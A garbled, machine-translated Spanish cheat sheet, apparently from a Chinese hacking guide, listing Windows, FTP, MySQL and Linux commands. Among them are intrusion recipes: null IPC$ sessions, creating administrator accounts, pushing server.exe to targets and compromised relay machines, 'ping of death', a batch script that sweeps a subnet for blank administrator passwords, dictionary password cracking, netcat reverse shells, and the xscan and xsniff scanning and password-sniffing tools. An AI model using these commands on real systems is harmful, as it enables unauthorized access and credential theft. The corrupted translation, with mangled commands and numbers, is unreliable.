¿Cuáles son los comandos de DOS en Windows?
-
net use \\IP\ipc$""/user:""Establezca un enlace IPC vacío.
Net utiliza \\IP\ipc$"contraseña"/usuario:"nombre de usuario" para establecer enlaces IPC no vacíos.
Net usa H:\\IP\C$"contraseña"/usuario:"nombre de usuario" para iniciar sesión directamente y se asigna a la otra parte C: Localmente es H:
Net usa h : \\ip\c$ asigna a la otra parte después de iniciar sesión. c: Para local, es h;
El uso neto \\ip\ipc$ /del elimina el enlace ipc.
Net use h: /del elimina la asignación local del otro extremo al nombre h:
Net use nombre de usuario contraseña /add crear usuario.
Usuario de Red Invitado/Activo: Es el usuario invitado activado.
Los usuarios de la red ven qué usuarios están allí.
Nombre de la cuenta de usuario de Net para ver las propiedades de la cuenta.
Nombre de usuario/agregar del administrador del grupo local neto Agregue "usuario" al administrador para otorgarle derechos de administrador. Nota: agregue la s plural después de administrador.
Net comienza a ver qué servicios están activados.
El nombre del servicio de inicio de red inicia el servicio (como el inicio de sesión remoto de la red, el cronograma de inicio de la red)
El nombre del servicio de detención de la red detiene el servicio.
Tiempo neto \\IP objetivo verifica el tiempo de la otra parte.
Net time \\ Target ip /set establece la hora de la computadora local para sincronizarse con la hora del host "target ip" y agrega el parámetro /yes para cancelar el mensaje de confirmación.
Net comprueba qué * * * permisos están habilitados en la LAN local.
Net view \\ip Ver qué * * * permisos están habilitados en la LAN de la otra parte.
Configuración de red muestra la configuración de red del sistema.
Desconexión de cierre de sesión de red* * *Disfruta
Servicio de suspensión de nombre del servicio de suspensión de red.
La red envía "mensajes de texto" IP para enviar mensajes a la otra parte.
Tipos de conexión de red e información utilizada en la red.
Compartir red para ver disfrute * * * local.
Participación neta ipc$open ipc$***disfruta.
Partición neta ipc$ /del Eliminar ipc$***
Partición neta c$ /del Eliminar c: * *Disfruta.
Después de que el usuario de red invitado 12345 inicie sesión, cambie la contraseña a 12345.
La contraseña de red cambia la contraseña de inicio de sesión del sistema.
Netstat -a para ver qué puertos están abiertos. Utilice netstat -an con frecuencia.
Netstat -n comprueba la conexión de red del puerto, normalmente netstat -an.
Netstat -v verifica el progreso del trabajo
netstat -p ejemplo de nombre de protocolo: netstat -p tcq/ip verifica el uso del protocolo (comprueba el uso del protocolo tcp/ip ).
Netstat -s muestra el uso de todos los protocolos en uso.
Nbtstat -A Uno de los puertos IP del 136 al 139 está abierto. Puede verificar el nombre de usuario del inicio de sesión reciente de la otra parte (el nombre de usuario es anterior a 03). Nota: el parámetro -A debe. estar en mayúscula.
tracert-parameter ruta de seguimiento de IP (o nombre de computadora) (paquete), parámetro: "-w número" se utiliza para establecer el intervalo de tiempo de espera.
Ping ip (o nombre de dominio) envía datos con un tamaño predeterminado de 32 bytes a otro host. Los parámetros son "-l [espacio] tamaño del paquete"; "-n veces para enviar datos"; "-t" significa hacer ping todo el tiempo.
Ping -t -l 65550 ip Ping de la muerte (enviar un archivo de más de 64K y hacer ping continuamente se convertirá en ping de la muerte).
Ipconfig (winipcfg) se usa para Windows NT y XP (Windows 95 98) para ver la dirección IP local. ipconfig puede usar el parámetro "/all" para mostrar toda la información de configuración.
Tlist -t muestra los procesos en una lista de líneas de árbol (es una herramienta adicional para el sistema, no se instala de forma predeterminada y se encuentra en la carpeta Soporte/herramientas del directorio de instalación).
Agregue el parámetro -F al nombre del proceso kill -F para finalizar forzosamente un proceso (es una herramienta adicional para el sistema que no está instalada por defecto y se encuentra en la carpeta Soporte/herramientas del directorio de instalación).
El nombre del archivo Del -F se puede eliminar después de agregar el parámetro -F. /AR, /AH, /AS y /AA significan eliminar archivos de solo lectura, ocultos, del sistema y de almacenamiento, respectivamente. /A-R, /A-H, /A-S y /A-A indican la eliminación de archivos que no sean archivos de solo lectura, ocultos, del sistema y de almacenamiento. Por ejemplo, "DEL/AR *.*" significa eliminar todos los archivos de solo lectura en el directorio actual, y "DEL/A-S *.*" significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema.
Segundo punto:
Elimine el directorio /S /Q o utilice: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos que contiene. Al mismo tiempo, use el parámetro /Q para cancelar la operación de eliminación y elimínela directamente después de que el sistema la confirme. (Ambos comandos tienen el mismo efecto)
Mueva la letra de unidad\ruta\ruta donde está almacenado el nombre del archivo\después de mover el nombre del archivo, use el parámetro /y para cancelar el mensaje para confirmar que es el mismo El archivo existe en el directorio movido y en la cobertura directa.
fc one . txt two . txt gt; 3t.txt compara dos archivos y genera las diferencias en el archivo 3t.txt. "》" y "》"; Este es un comando de redirección
Abra la tarea programada registrada en el número de identificación.
En /delete para detener todas las tareas programadas, use el parámetro /yes. , puede detenerlo directamente sin confirmación.
Detener la tarea programada registrada en el número de identificación/eliminar
Ver todas las tareas programadas en \ip time nombre del programa (o comando). /r Ejecute el programa de la otra parte en un momento determinado y reinicie la computadora.
Presione nombre de usuario@host para ver qué usuarios han iniciado sesión recientemente.
El puerto IP de Telnet está lejos del. servidor de inicio de sesión, el puerto predeterminado es 23.
Abrir ip se conecta a la IP (comando después de iniciar sesión en telnet)
Telnet: escriba telnet directamente en esta máquina. Ingresará telnet en esta máquina.
Copie ruta\nombre de archivo1 ruta\nombre de archivo2 /yCopie el archivo 1 en el directorio especificado como archivo 2 y coloque el archivo en el directorio que desea sobrescribir. Utilice el parámetro /y para cancelar la confirmación. >
Copia c:\srv.exe \\ip\admin$ para copiar el c:\srv.exe local al administrador de la otra parte
cppy 1st.jpg/b 2st.txt/. a 3st.jpg Oculte el contenido de 2st.txt en 1st.jpg para generar un nuevo archivo en 3st.jpg Nota: El encabezado del archivo 2st.txt debe tener tres líneas vacías. Parámetros: /b se refiere al archivo binario. /a hace referencia al archivo ASCLL.
copiar\\IP\admin$\svv.exe c:\o:copiar\\IP\admin$\*. *Copie los archivos srv.exe (todos los archivos) utilizados por otros administradores $ * * * al c local:
Xcopiar archivo o árbol de directorios dirección de destino\nombre del directorio copia archivos y árboles de directorios, sobrescribiendo el mismo archivo sin utilizando el parámetro /y indicador.
Tftp -i su propia IP (use la IP de la máquina de carne cuando use la máquina de carne como trampolín) obtenga server.exe después de iniciar sesión en c:\server.exe, descargue el server.exe de "IP " al host de destino C:\servidor. Parámetro exe: -i significa transmitir en modo binario, como cuando se transmiten archivos EXE, si no se agrega -i, significa transmitir en modo ASCII (transmitir modo de archivo de texto).
Tftp -i IP pone c:\server.exe para iniciar sesión y cargar c:\server.exe local en el host.
El puerto ftp ip se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. Bin se refiere a la transmisión binaria (entrada de archivo ejecutable), de forma predeterminada, se transmite en formato ASCII (si es un archivo de texto).
La impresión de ruta muestra el enrutamiento IP, que muestra principalmente la dirección de red, la dirección de red, la máscara de subred, la máscara de red, la dirección de puerta de enlace, la dirección de puerta de enlace y la dirección de interfaz.
Arp comprueba y procesa la caché ARP. ARP significa Resolución de nombres y es responsable de resolver las IP en direcciones MAC físicas. Arp -a mostrará toda la información.
Inicie un programa o comando con el nombre /max o /min para abrir una nueva ventana y maximizar (minimizar) ejecutar un programa o comando.
Memoria utilizada para comprobar el uso de la CPU
Nombre del archivo de propiedades (nombre del directorio) para ver las propiedades del archivo (directorio).
El atributo nombre de archivo-A -R -S -H o A R S H elimina (agrega) los atributos de archivo, de solo lectura, de sistema y ocultos del archivo. with se agrega como atributo.
Ver el directorio del archivo. Parámetros: /Q muestra a qué usuario pertenecen los archivos y directorios, /T:C muestra la hora de creación del archivo, /T:A muestra la hora del último acceso al archivo, /T:W muestra la hora de la última modificación del archivo.
Fecha/Hora/tAl utilizar este parámetro, es decir, "Fecha/t" y "Hora/T", solo se mostrará la fecha y hora actuales sin ingresar una nueva fecha y hora.
Establecer especifica el nombre de la variable de entorno = el carácter que se asignará a la variable para establecer la variable de entorno.
Set muestra todas las variables de entorno actuales.
Set p (u otros caracteres) muestra todas las variables de entorno que actualmente comienzan con el carácter p (u otros caracteres).
Pausa detiene el proceso por lotes y muestra: Presione cualquier tecla para continuar. ....
Si realiza procesamiento condicional en un programa por lotes (consulte if comando y variables para más detalles)
La etiqueta goto apunta cmd.exe al proceso por lotes La línea de etiqueta en el programa (la etiqueta debe ser una línea separada y comenzar con dos puntos, como la etiqueta ":start").
Ruta de llamada\nombre de archivo por lotes Llama a otro programa por lotes desde un programa por lotes (ver llamada/?)
Para realiza una operación específica en cada archivo en un conjunto de comandos de archivos (ver para Comandos y variables para más detalles).
Echo activado o desactivado Activa o desactiva el eco y muestra la configuración actual del eco. Solo se muestra el eco y no los parámetros.
Los mensajes de eco muestran información en la pantalla.
Información de eco》》; Pass.txt guarda "información" en el archivo pass.txt.
Buscar cadena "Hola" aa.txt busca la cadena Hola en el archivo aa .txt.
Buscar nombre de archivo Buscar archivo
Título Nombre de título Cambia el nombre del título de la ventana CMD.
Los valores de color establecen los colores de primer plano y fondo de la consola cmd; 0=negro, 1=azul, 2=verde, 3=verde claro, 4=rojo, 5=púrpura, 6=amarillo; , 7 = blanco, 8 = gris, 9 = azul claro, a = verde claro, B = verde claro, C = rojo claro, D = violeta claro.
Cambie el nombre del mensaje al símbolo del sistema de visualización de cmd.exe (cambie C:\D:\ a: EntSky\).
#33:
Ver muestra información de la versión en la ventana de DOS.
La ventana emergente de Winver muestra información de la versión (tamaño de la memoria, versión del sistema, versión del parche, nombre de la computadora).
Formatear letra /FS: escriba formatear disco, escriba: FAT, FAT32, NTFS. Por ejemplo: Formato D: /FS: NTFS.
Nombre del directorio md crear directorio
Reemplazar el directorio del archivo fuente del archivo que se va a reemplazar Reemplazar archivo
Ren nombre del archivo original nuevo nombre del archivo cambiar nombre del archivo
p>
El árbol muestra directorios en una estructura de árbol, y los nombres de los archivos en la primera carpeta se enumerarán usando el parámetro -f.
Escribir nombre de archivo muestra el contenido de un archivo de texto.
Más nombres de archivos muestran los archivos de salida pantalla por pantalla.
Comando Doskey lock = carácter
Comando Doskey para desbloqueo = comando de bloqueo proporcionado para DOS (editar línea de comando, llamar al comando win2k y crear macro). Por ejemplo: comando lock dir: doskey dir=entsky (doskey dir = dir no se puede usar desbloquear: doskey dir=
Taskmgr llama al administrador de tareas
Chkdsk /F D: verificar); disco D y mostrar informe de estado; agregar el parámetro /f y corregir errores en el disco.
Tlntadmn telnt service admn, escriba Tlntadmn, seleccione 3 y luego seleccione 8 para cambiar el puerto predeterminado 23 del servicio telnet a cualquier otro puerto.
Salir Para salir del programa cmd.exe o actualmente, use el parámetro /B para salir del script por lotes actual en lugar de cmd.exe.
Ruta ruta\nombre del archivo ejecutable establece la ruta al archivo ejecutable.
Cmd inicia la ventana de interpretación de comandos de win2K. Parámetros: /eff, /en desactiva y activa la expansión de comandos. Ver cmd/?
el nombre del archivo de registro regedit /s se importa al registro; el parámetro /S se refiere a la importación en modo silencioso sin ningún mensaje
el nombre del archivo de registro regedit /e exporta el registro
p>El parámetro de nombre de archivo Cacls muestra o modifica la lista de control de acceso a archivos (ACL), para formato NTFS. Parámetros: /D nombre de usuario: configurado para denegar el acceso al usuario; /P nombre de usuario: permanente reemplaza los derechos de acceso del usuario especificado; /G nombre de usuario: permanente otorga derechos de acceso al usuario especificado: N ninguno, R lectura, W escritura; , C cambia (escribe), F tiene control total; ejemplo: cacls D:\test.txt /D pub establece D:\test.txt para denegar el acceso a los usuarios del pub.
Nombre del archivo Cacls para ver la lista de permisos de usuario de acceso al archivo.
El contenido de texto REM agrega comentarios a archivos por lotes
Ver o cambiar la configuración de la red local
#4 Cuatro:
Comando de servicio IIS:
Iisreset /reboot reinicia la computadora win2k (pero aparece un mensaje que indica que el sistema se reiniciará).
Iisreset /start o stop inicia (detiene) todos los servicios de Internet.
Iisreset /restart detiene y reinicia todos los servicios de Internet.
Iisreset /status muestra el estado de todos los servicios de Internet.
Iisreset /enable or enable habilita (deshabilita) el reinicio del servicio de Internet en el sistema local.
Iisreset /rebootonerror Al iniciar, detener o reiniciar el servicio de Internet, si ocurre un error, se reiniciará.
Si no se puede detener el servicio de Internet, Iisreset /noforce no finalizará el servicio de Internet por la fuerza.
Iisreset /timeout Val no detuvo el servicio de Internet cuando expiró el tiempo de espera (segundos). Si se especifica el parámetro /rebooterror, la computadora se reiniciará. Los valores predeterminados son 20 segundos para reiniciar, 60 segundos para detener y 0 segundos para reiniciar.
Comando FTP: (los detalles se darán más adelante)
El formato de línea de comando de ftp es:
FTP-V-D-I-N-G [nombre de host] -V muestra el servidor remoto toda la información de respuesta.
-d usa el modo de depuración.
-n limita el inicio de sesión automático de ftp, es decir, no lo utiliza. archivo netrc.
-g cancela el nombre del archivo global.
¿Ayuda [comando] o? [Comando] Ver descripción del comando
Adiós o salir finaliza el proceso FTP del host y sale del modo de administración FTP.
Pwd enumera el directorio del host remoto actual.
Cargue o envíe el nombre del archivo local [Nombre del archivo cargado en el host] para enviar el archivo local al host remoto.
Obtener o recv [el nombre del archivo del host remoto] [el nombre del archivo después de descargarlo al local] se transfiere del host remoto al host local.
mget[remote-files] recibe un lote de archivos del host remoto al host local.
Mput local-files transfiere un lote de archivos desde el host local al host remoto.
Dir o ls [directorio-remoto] [archivo-local] enumera los archivos en el directorio del host remoto actual. Si hay un archivo local, los resultados se escriben en el archivo local.
Los archivos de configuración ASCII se envían en formato ASCII (predeterminado).
Los archivos bin o de configuración de imagen se envían en modo binario.
La campana hará sonar una alerta cada vez que se complete una transferencia de archivos.
Cdup vuelve al directorio anterior.
Cerrar interrumpe la sesión ftp con el servidor remoto (correspondiente a abrir)
abrir host [puerto] establece una conexión con el servidor ftp especificado y puede especificar el puerto de conexión.
Eliminar elimina un archivo del host remoto.
Eliminar un lote de archivos.
Mkdir nombre-directorio crea un directorio en el host remoto.
Renombrar [de] [a] para cambiar el nombre del archivo en el host remoto.
Rmdir nombre-directorio elimina el directorio en el host remoto.
Estado muestra el estado actual de FTP.
El sistema muestra el tipo de sistema host remoto.
Usuario Nombre de usuario [Contraseña] [Cuenta] Utilice un nombre de usuario diferente para iniciar sesión en el host remoto nuevamente.
Abrir el host [puerto] restablece una nueva conexión.
Modo de aviso interactivo
Comando de macro de definición de Macdef
lcd cambiará el directorio de trabajo del host local actual. Si está predeterminado, irá al. página de inicio del usuario actual.
Chmod cambia los permisos de archivos en el host remoto.
Cuando se activa el caso, los nombres de los archivos copiados por el comando MGET se transferirán a la computadora local y todos los archivos se convertirán a letras minúsculas.
Cd remote-dir ingresa al directorio del host remoto.
Cdup ingresa al directorio principal del directorio del host remoto.
! Ejecute un shell interactivo en la máquina local, la salida regresa al entorno ftp, por ejemplo. ls*. Vitality
Quinto lugar:
Comando MYSQL:
Mysql -h dirección de host -u nombre de usuario -p contraseña para conectarse a MySQL si se acaba de instalar MYSQL; , el superusuario root no tiene contraseña.
(Por ejemplo: MySQL-h 110.110.1110-urot-p 123456)
Nota: u y root se pueden dejar en blanco, y otros también se pueden dejar en blanco) p>
Salir de MYSQL
Mysqladmin -u nombre de usuario -p contraseña antigua nueva contraseña cambiar contraseña
Otorgar permiso de selección a la base de datos. * al nombre de usuario@loginhost identificado por "contraseña"; agregar nuevo usuario. (Nota: a diferencia de lo anterior, los siguientes son todos comandos en el entorno MYSQL, por lo que van seguidos de un punto y coma como terminador del comando).
Muestra la base de datos; Al principio solo existían dos bases de datos: mysql y test. La biblioteca MySQL es muy importante. Contiene información del sistema MYSQL. De hecho, utilizamos esta biblioteca cuando cambiamos contraseñas y agregamos nuevos usuarios.
Usar mysql
Mostrar la tabla; mostrar la tabla de datos en la biblioteca
Describir el nombre de la tabla para mostrar la estructura de la tabla de datos
Crear un nombre de biblioteca de base de datos; crear biblioteca
Usar nombre de biblioteca;
Crear nombre de tabla (lista de configuración de campo)
Eliminar base de datos; nombre de la biblioteca;
p>
Eliminar el nombre de la tabla; eliminar la base de datos y eliminar la tabla
Eliminar del nombre de la tabla; borrar registros en la tabla
Seleccione * del nombre de la tabla; mostrar en la tabla Registro
MySQL dump-opt school gt; base de datos de respaldo School.bbb: (El comando se ejecuta en el directorio \\mysql\\bin de DOS); la base de datos school al archivo school.bbb, aquí hay un archivo de texto con un nombre de archivo arbitrario. Ábrelo y mira si descubres algo nuevo.
Nuevos comandos bajo el sistema win2003 (parte práctica):
apagar/parámetro apaga o reinicia el host local o remoto.
Descripción del parámetro: /S apaga el host, /R reinicia el host, /T establece el tiempo de retardo en el rango de 0 ~ 180 segundos, /A cancela el inicio, /m//Host remoto especificado por IP.
Ejemplo: apagado /r /t 0 Reiniciar el host local inmediatamente (sin demora)
El nombre del proceso de tarea/parámetro o el pid del proceso finaliza una o más tareas y procesos.
Descripción del parámetro: /pid es el pid del proceso a terminar. Puede usar el comando tasklist para obtener el pid de cada proceso, /IM es el nombre del proceso a terminar, /. F es el proceso para forzar la terminación, /T es para terminar el proceso A especificado y el proceso secundario que inicia.
La lista de tareas muestra los procesos, servicios e identificadores de proceso (PID) de los procesos de servicio que se ejecutan actualmente en hosts locales y remotos.
Descripción del parámetro: /M enumera los archivos dll cargados por el proceso actual, /SVC muestra los servicios correspondientes a cada proceso. Si no hay parámetros, solo se enumera el proceso actual.
#66:
Comandos básicos en el sistema Linux: distingue entre mayúsculas y minúsculas.
Uname muestra información de la versión (igual que la versión de win2K)
Dir muestra los archivos en el directorio actual, ls -al muestra los archivos ocultos (igual que el directorio de win2K).
Consulta la ubicación del directorio actual.
Cd cd.. Regresar al directorio anterior Note que hay un espacio entre cd y... CD/ para regresar al directorio raíz.
Nombre del archivo Caterpillar para ver el contenido del archivo
cat gtAbc.txt escribe el contenido en el archivo abc.txt.
Más nombres de archivos muestran archivos de texto página por página.
Cp copia archivos
Mv mueve archivos
Rm nombre de archivo elimina archivos, rm -a nombre de directorio elimina directorios y subdirectorios.
El nombre del directorio Mkdir crea un directorio
Rmdir elimina un subdirectorio y no hay documentos en el directorio.
Chmod establece los permisos de acceso a archivos o directorios.
Grep busca cadenas en archivos.
Comparación de archivos de diferencia
Buscar búsqueda de archivos
Fecha Fecha y hora actuales.
Pregunta quién está utilizando actualmente la misma máquina que tú y cuándo y dónde iniciaron sesión.
wConsulta la información detallada del usuario actual de la computadora.
Por favor, comprueba el nombre de tu cuenta.
Grupo Ver el grupo de alguien.
Passwd cambiar contraseña
Historial, consulta tus propios comandos.
Ps muestra el estado del proceso.
Kill detiene el proceso.
Los hackers de Gcc suelen utilizarlo para compilar archivos escritos en lenguaje C.
Sus permisos se convierten al usuario especificado.
Telnet IP telnet se conecta a otro host (igual que win2K). Cuando aparece bash$, la conexión es exitosa.
Ftp conexión ftp al servidor (igual que win2K).
Adjunto: Comandos y variables de procesamiento por lotes
1: Formato básico de comando y variables for:
Variable FOR/parámetro en (set) docommand [command _ parámetros] variable: especifique un parámetro reemplazable de una sola letra, como: i, y use: i para especificar una variable, y use: i para llamar a la variable, que distingue entre mayúsculas y minúsculas (i no es igual a i).
El rango de variables que el lote puede procesar a la vez es 0-9 * * * 10, donde 0 se usa de forma predeterminada para el nombre del archivo por lotes y 1 es el primer valor ingresado al usar este lote. Asimismo, 2-9 se refiere a los valores ingresados del segundo al noveno; ejemplo: netuse \\ ip \ ipC $ pass/user: la IP en el usuario es 1, la contraseña es 2 y el usuario es 3.
(set): utilice comodines para especificar un archivo o un grupo de archivos, como (D:\user.txt) y (1 1 254) (1-1 254), {"(1 65438)" (1-1 254) "Descripción: de 254 a 1}
Comando: Especifique el comando que se ejecutará en el primer archivo, por ejemplo: comando net use si desea ejecutar varios; comandos, comando esta adición de sala:; separado
Command_parameters: especifica parámetros o interruptores de línea de comando para un comando específico
IN (set): se refiere al valor en IN (set); Comando DO: se refiere a la ejecución.
Parámetros: /L representa la forma incremental {(set) es la forma incremental}; ) es un archivo, por ejemplo ( d:\pass.txt)}.
Ejemplo de uso:
@Desactivar eco
Formato de eco: test.bat *. *.*》test .txt
Para /L G en (1 1 254), ejecute echo 1. G gt gt prueba. uso neto del amplificador\\1. g/usuario: administrador | busque "Comando completado exitosamente" > prueba gt. txt
Instrucciones para guardar como test.bat: Intente establecer conexiones IPC$ con una contraseña de administrador vacía para 254 IP en el segmento de red Clase C especificado en secuencia. Si tiene éxito, guarde la IP en test.txt.
/L se refiere a la forma incremental (es decir, de 1-254 o 254-1); ingrese los primeros tres dígitos de la IP: *. *.* es el 1 predeterminado para el procesamiento por lotes; G es una variable (el último dígito de ip se usa para separar los comandos echo y net use para establecer ipc$, y use buscar en los resultados; hay información de "comando completado con éxito"; 1.G es la dirección IP completa; (1 1 254) se refiere al valor inicial, la cantidad de crecimiento y el valor final.
@Close echo
Formato de eco: ok.bat ip
Para /F i in (D:\user.dic), ejecute smb.exe 1 I D:\pass.DIC 200
Guardar como: ok.exe Descripción: Después de ingresar la IP, use el archivo del diccionario d:\pass.dic para descifrar la contraseña del usuario en d:\user.dic , hasta que se hayan obtenido todos los valores del archivo. i es el nombre de usuario; 1 es la dirección IP ingresada (predeterminada).
#77:
2.2: Formato básico del comando if y las variables:
IF[not]instrucción de comando numérico de nivel de error Si el programa finalmente devuelve igual a o Para un código de salida mayor que el número especificado, la condición especificada es "verdadera".
Ejemplo: El comando IF errorlevel 0 se refiere al comando después de ejecutar el programa cuando el valor de retorno es 0; el comando IF not errorlevel 1 significa que si el último valor devuelto por la ejecución del programa no es igual a; 1, se ejecutará la siguiente Orden.
0 significa que se encontró y se ejecutó exitosamente (verdadero); 1 significa que no se encontró ni se ejecutó (falso).
IF [not] cadena 1 == cadena 2 instrucción de comando Si la cadena de texto especificada coincide (es decir, la cadena 1 es igual a la cadena 2), se ejecutará el siguiente comando.
Ejemplo: "if" 2"="4"goto start" significa: si la segunda variable ingresada es 4, se ejecutará el siguiente comando (nota: al llamar a la variable, el nombre de la variable será añadido con "" ).
IF[not]exist declaración de comando de nombre de archivo Si el nombre de archivo especificado existe, se ejecutará el siguiente comando.
Por ejemplo: "Si no hay nc.exe · Geto Ende" significa: Si no encuentra el archivo nc.exe, salte a la etiqueta ":end".
IF [no] número de nivel de error declaración de comando else declaración de comando o IF [no] cadena 1 = = cadena 2 declaración de comando else declaración de comando o IF [no] existe nombre de archivo declaración de comando else declaración de comando más: Después de la declaración del comando else, se refiere al comando después de la línea else cuando la condición anterior no es verdadera. Nota: else debe estar en la misma línea para que sea válido.
Cuando hay un comando del, se debe usar todo el contenido del comando del
(2) Comandos externos del sistema (es necesario descargar las herramientas relevantes):
1 navaja suiza: nc.exe
Descripción del parámetro:
-h Ver información de ayuda
Modo de fondo tridimensional
-e redirección del programa de programación, una vez conectado, ejecute [Peligro]
intervalo de retardo de isecs
-l modo de escucha, usado para conexiones entrantes
-L modo de monitoreo, continúe monitoreando después de la conexión está cerrado hasta CTR C .
-n dirección IP, no nombre de dominio.
-oEl vídeo registra la transmisión de 16.
-p[espacio]número de puerto local del puerto
-rPuertos locales y remotos aleatorios
-tUtilice el modo interactivo Telnet.
-u modo UDP
-v salida detallada, utilice -vv para una salida más detallada.
-w Intervalo de retardo de tiempo de espera numérico
-z Desactiva la entrada y salida (cuando se usa para escanear anclajes)
Uso básico:
NC-NVV 192.168.0.180 está conectado al puerto 80 del host 192.168.0.1.
Nc -l -p 80 abre el puerto TCP local 80 y escucha.
NC-NVV-W2-z 192.168 0 . 180-1024 80-192.168 0 .
NC -l -p 5354 -t -e c: winntsystem32cmd.exe vincula el cmdshell del host remoto al puerto TCP 5354 del host remoto.
NC -t -e c: winntsystem32cmd.exe 192.168 0 2 5354 Establece el cmdshell del host remoto y se conecta de forma inversa al puerto 5354 de 192.438 068.0.2.
Uso avanzado:
Nc -L -p 80 usado como honeypot 1: Abrir y escuchar continuamente el puerto 80 hasta CTR C.
nc -L -p 80》C:\log.txt se abre como un honeypot con 2: y escucha continuamente el puerto 80 hasta CTR C, y envía los resultados a c:\log.txt.
NC-L-p 80 lt; C:\honeyport.txt como honeypot de 3-1: abre y escucha continuamente el puerto 80 hasta CTR C, y envía el contenido en c:\honeyport.txt a una tubería, que también puede desempeñar un papel en la transferencia de archivos.
Type.exe C:\honey port|NC-L-P 80 se utiliza como honeypot. 3-2: Abra y monitoree continuamente el puerto 80 hasta CTR C y envíe el contenido en c:\honeyport.txt a la tubería, que también puede desempeñar un papel en la transferencia de archivos.
Para esta máquina: nc -l -p puerto local.
En otro host: NC-e cmd.exe IP local -p puerto local *win2K.
Nc -e /bin/sh IP local -p puerto local *linux, la conexión inversa de Unix atraviesa el firewall del otro host.
Utilice esta máquina: nc -d -l -p puerto local
En otro host: nc -vv IP local puerto local》; Enviar archivos a otro host.
Nota:
Comando de canalización
lt o 》comando de redirección. "lt, por ejemplo: tlntadmn"Test.txt se refiere a asignar el contenido de test.txt al comando tlntadmn.
@ significa ejecutar el comando después de @, pero no se mostrará (ejecución en segundo plano: @ @ dir c:\win nt》gt significa: dir está en; en segundo plano Ejecutado, los resultados se almacenan en D:\log.txt.
gtwith》》; La diferencia entre "》" significa: sobrescribir; "gt》; significa guardar en (agregar a).
Por ejemplo: @ dir c:\win nt 》 》; D:\log.txt y @dir c:\winnt》Dos comandos d:\log.txt comparan dos veces: usar》 El propósito es guardar todos los resultados secundarios y usar:》Solo hay un resultado porque El segundo resultado cubre el primer resultado
#88:
2. Herramienta de escaneo de anclajes:
Formato básico
p>xscan. -host lt;Start IP gt【- lt;End IP gt】ltProyecto de prueba》【Otras opciones】Escanee toda la información del host en la parte "Iniciar IP hasta finalizar IP" del punto de anclaje
xscan -. file lthost nombre de archivo de lista》Proyecto de prueba》[Otras opciones] Escanee toda la información del host en el ancla "Nombre de archivo de lista de IP del host"
Proyecto de prueba
-activo detecta si el host es activo
-el sistema operativo detecta el tipo de sistema operativo remoto (a través de los protocolos NETBIOS y SNMP)
-el puerto detecta el estado del puerto de los servicios comunes
-. ftp detecta contraseñas débiles de ftp
-pub detecta el permiso de escritura de usuarios anónimos de servicios FTP
-pop3 detecta contraseñas débiles de pop 3-server
-smtp. detecta vulnerabilidades del servidor smtp
-sql detecta contraseñas débiles de SQL-Server
-smb detecta contraseñas débiles de NT-Server
-iis detecta codificación/decodificación de iis. vulnerabilidades
-cgi detecta vulnerabilidades de cgi
-nasl carga scripts de ataque de Nessus
-todo detecta todos los elementos anteriores
Otras opciones
-i número de adaptador establece el adaptador de red, que se puede obtener a través del parámetro "-l".
-l muestra todos los adaptadores de red
-. v muestra el progreso del análisis detallado.
-p omite los hosts que no responden
-o omite los hosts sin puertos abiertos
-t número de subprocesos simultáneos. número de hosts simultáneos especifica el número máximo de subprocesos simultáneos y el número de hosts simultáneos. Los números predeterminados son 100 y 10.
-Nombre del archivo de registro especifica el nombre del archivo del informe de análisis (el sufijo es: TXT). o archivo en formato HTML
Ejemplo de uso
xscan-host 192. 168. 1-192. 168. 255. 255-Detección de plagas activa completa 092. 599999999909096
xscan-Host 192.168.1-192.168 255 . 255-Port-SMB-T150-O detecta el estado del puerto estándar del host en el segmento de red 192.168.255.255, nt usuario de contraseña débil, número máximo de subprocesos simultáneos en 150, se omiten los hosts sin puertos abiertos.
xscan-file hostlist.txt-port-CGI-t200, 5-v-o detecta el estado del puerto estándar y las vulnerabilidades CGI de todos los hosts enumerados en el archivo "hostlist.txt".
El número máximo de subprocesos simultáneos es 200 y se pueden detectar hasta 5 hosts al mismo tiempo. Se mostrará el progreso de detección detallado y se omitirán los hosts sin puertos abiertos.
#99:
3. Rastreador de línea de comando: xsniff.exe.
Puede capturar la contraseña del protocolo FTP/SMTP/POP3/HTTP en LAN.
Descripción del parámetro
-datagrama tcp de salida tcp
-datagrama udp de salida udp
-datagrama ICMP de salida ICMP
p >- Pasar información de contraseña del filtro.
-Ocultar ejecución en segundo plano
-host resuelve el nombre del host.
-addr dirección ip filtro dirección ip
-puerto puerto filtro puerto
-me